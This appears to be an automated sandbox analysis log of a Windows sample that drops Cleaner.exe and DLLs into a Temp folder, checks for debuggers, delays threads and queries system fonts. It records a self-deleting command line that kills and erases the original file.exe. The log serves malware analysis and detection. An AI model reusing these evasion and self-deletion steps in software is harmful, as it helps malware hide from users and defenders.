                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exe TID: 4516Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeFile Volume queried: C:\ FullSizeInformation
                  Source: Cleaner.exe, 00000016.00000002.566457832.000001CFE1A49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeMemory allocated: page read and write | page guard
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
